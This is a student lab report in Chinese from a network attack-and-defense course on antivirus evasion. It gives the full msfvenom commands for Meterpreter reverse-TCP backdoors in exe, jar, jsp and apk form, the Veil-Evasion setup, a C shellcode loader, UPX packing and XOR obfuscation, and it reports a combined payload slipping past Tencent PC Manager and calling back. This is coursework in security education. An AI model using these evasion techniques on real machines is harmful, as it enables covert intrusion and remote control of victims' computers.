2019-2020-2 20175202葛旭阳《网络对抗技术》 Exp3 免杀原理与实践
一、实验任务
1.方法:
①正确使用msf编译器。
②msfvenom生成如jar之类的其他文件。
③veil。
④加壳工具。
⑤使用C+shellcode编程。
⑥使用其他课程未介绍方法。
2.通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)
3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本。
4.基础问题回答。
二、实验步骤
【任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧】
正确使用msf编码器
1.通过共享文件夹将实验二中最后生成的20175202_backdoor.exe
后门程序传到主机中(要预先关闭杀毒软件);
2.对20175202_backdoor.exe
后门程序通过VirusTotal或VirSCAN进行检测,VirsusTotal中结果如下;
我们发现没有经过编码的原始后门程序,很容易就被杀软检测到了。下面我们使用msf编码器对改后门程序进行编码;
3.我们通过msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.40.129 LPORT=5202 -f exe > exp3_encoded10.exe
命令生成十次编码的后门程序;参数-I
用于设置迭代次数;LHOST后面是Kali中的ip地址,生成结果如下;
4.对exp3_encoded10.exe
后门程序通过VirusTotal或VirSCAN进行检测,VirsusTotal中结果如下;
我们发现,多次编码对于免杀效果不大。
msfvenom生成如jar之类的其他文件
1.在Kali中生成jar文件,使用的命令为msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.40.129 LPORT=5202 x> 20175202java.jar
,结果如下;
2.对20175202java.jar
后门程序通过VirusTotal或VirSCAN进行检测,VirsusTotal中结果如下;
3.在Kali中生成jsp文件,使用的命令为msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.40.129 LPORT=5202 x> 20175202jsp.jsp
,结果如下;
4.对20175202jsp.jsp
后门程序通过VirusTotal或VirSCAN进行检测,VirsusTotal中结果如下;
5.在Kali中生成apk文件,使用的命令为msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.40.129 LPORT=5202 x> 20175202android.apk
,结果如下;
6.对20175202android.apk
后门程序通过VirusTotal或VirSCAN进行检测,VirsusTotal中结果如下;
使用veil-evasion生成后门程序及检测
1.Kali中没有veil,所以要事先安装,首先输入以下命令;
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
2.使用sudo apt-get install veil-evasion
命令安装veil,中途会遇到很多很多问题。。,出现以下效果代表安装成功;
3.使用veil
命令进入veil
中,然后输入use evasion
,进入veil-evasion
;
4.输入命令use c/meterpreter/rev_tcp.py
进入配置界面;
5.输入set LHOST 192.168.40.129
设置反弹连接IP,输入 set LPORT 5202
设置端口,然后输入options
,如图;
6.输入generate
生成文件,接着输入生成的playload
的名称veil_c_5202
,保存路径为: /var/lib/veil/output/source/veil_c_5202.exe
,如图;
7.在文件夹中然后选择其他位置,然后选择计算机,然后根据上一步得到的路劲一次打开文件夹,可以找到生成的veil_c_5202.exe
,如图;
8.对veil_c_5202.exe
后门程序通过VirusTotal或VirSCAN进行检测,VirsusTotal中结果如下;
使用C+shellcode编程
1.输入 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.129 LPORT=5202 -f c
命令来生成shellcode
;
2.命令行中通过vim gxyshell.c
创建.c文件,将生产成的buf [ ] 赋值到代码中;
unsigned char buf[] = (上图中生成的shellcode)
int main()
{
int (func)() = (int()())buf;
func();
}
3.通过i686-w64-mingw32-g++ gxyshell.c -o gxyshell.exe
命令,将.c文件转化为可执行文件;
4.对gxyshell.exe
后门程序通过VirusTotal或VirSCAN进行检测,VirsusTotal中结果如下;
使用加壳工具
1.使用命令upx gxyshell.exe -o gxyshell_upxed.exe
,将上一步中生成的gxyshell.exe
加压缩壳得到gxyshell_upxed.exe
;
2.对gxyshell_upxed.exe
后门程序通过VirusTotal或VirSCAN进行检测,VirsusTotal中结果如下;
【任务二:使用其他课程未介绍的方法】
1.我们对shellcode进行免杀变形,步骤如下;
(1)我们首先使用msfvenom
生成shellcode
;
(2)将shellcode依次与'0'进行异或;
(3)我们把异或后的shellcode
加入生成的程序,该程序再将此shellcode
与"0"依次异或一次,把它还原为原来的shellcode,因为没有了Shellcode的特征码,所以不易被杀软检测到;
(4)最后生成该后门程序。
2.对qtffgxy.exe
后门程序通过VirusTotal或VirSCAN进行检测,VirsusTotal中结果如下;
【任务三:通过组合应用各种技术实现恶意代码免杀】
1.方式为多次编码的shellcode+异或"0"的变形+免杀申请动态内存代码+压缩壳;
2.生成的是5202gxyzh.exe
,目标是自己的主机,杀毒软件是电脑管家;
3.测试可用性,结果如下图,扫描出的3个危险报警是实验二和这次试验之前的一些后门程序,本次综合各种技术生成的程序,成功逃过了电脑管家;
【任务四:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本】
1.我使用在同一路由器下的另一台电脑,操作系统是win10,杀毒软件是电脑管家;
2.我们打开电脑管家,然后开始运行后门程序5202gxyzh.exe
,发现可以正常运行,杀毒软件并未检测到,并且可以正常回连,结果如图;
三、实验过程中遇到的问题
解决:参考学长学姐博客,换了一种下载方式,折腾了很久,终于下载成功了;
2.问题:veil
下载成功后,输入veil
,仍然提示错误,无法运行````veil```,如下;
解决:参考CSDN中,看到有人说,执行命令/usr/share/veil/config/setup.sh --force --silent
可自动修护一些错误,使用命令后,确实解决了问题,如下;
3.问题:在实验中,复制shellcode
的内容后,将.c文件转成可执行程序时,提示以下错误,如图;
解决:发现将shellcode
的内容复制后,没有在结尾加分号,不符合代码标准,同时没有下载编码软件,加了分号,并使用命令i686-w64-mingw32-g++ wpyshell.c -o wpyshell.exe
下载编码软件后,成功转化了,如图;
四、问题的回答
1.杀软是如何检测出恶意代码的?
回答:①根据特征来检测:恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。
②根据行为来检测:如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码,有时候不是恶意代码的程序也会把查杀,因为这些程序做了一些计算机认为不安全的事情,比较常见的就是各自破解补丁或者游戏外挂等。
2.免杀是做什么?
回答:免杀就是通过某些手段对软件进行处理或变化,使其特征不在杀软的木马库里,让它不被杀毒软件检测出来。
3.免杀的基本方法有哪些?
回答:①改变特征码
加壳:压缩壳 加密壳(就是给含有恶意代码的程序加一个外包装,让杀软不知道里面装的是什么);用encode进行编码;基于payload重新编译生成可执行文件;用其他语言进行重写再编译;veil-evasion。
②改变行为
尽量使用反弹式连接;使用隧道技术;加密通讯数据;加入混淆作用的正常功能代码。
③非常规方法
使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中;使用社工类攻击,诱骗目标关闭AV软件;纯手工打造一个恶意软件。
4.开启杀软能绝对防止电脑中恶意代码吗?
回答:通过实验我们发现,恶意代码会通过各种方式隐藏自己,修饰自己,逃过一些杀毒软件的“法眼”,因此开启杀软并不能绝对防止电脑中恶意代码。
五、实验心得与体会
这次实验让我感觉非常刺激,在之前的实验中,我们在实验中需要全程关闭杀软,才能正常进行。而在本次实验中,我们通过加壳、重编译、反弹式连接等各种方法,一次次逃过杀软的“法眼”。在实验过程的推进中,随着使用的技术越来越多,并相互结合,每次在VirsusTotal中检测时,发现能够发现的杀软数量越来越低,心中的满足感就越来越强,有一种“小黑客”的感觉。这次实验的整体过程不太顺利,veil的下载花了一天多的时间,尝试了各种方法,才终于下载成功,下载成功后还不能正常使用,又需要查阅资料,来一点点修复,这次实验对我的耐心考验很大,实验过程中确实暴躁过,但最终一步步完成了实验,心中更多的是成就感。通过这次实验,我发现了自己平时很信任的杀毒软件其实并没有那么可靠,现在的恶意代码有很多种隐藏方式,他们很容易逃过杀软的法眼,因此以后不能只依靠杀软,自己的安全意识也还要进一步增强,这是这次实验给我的一个很大的启示。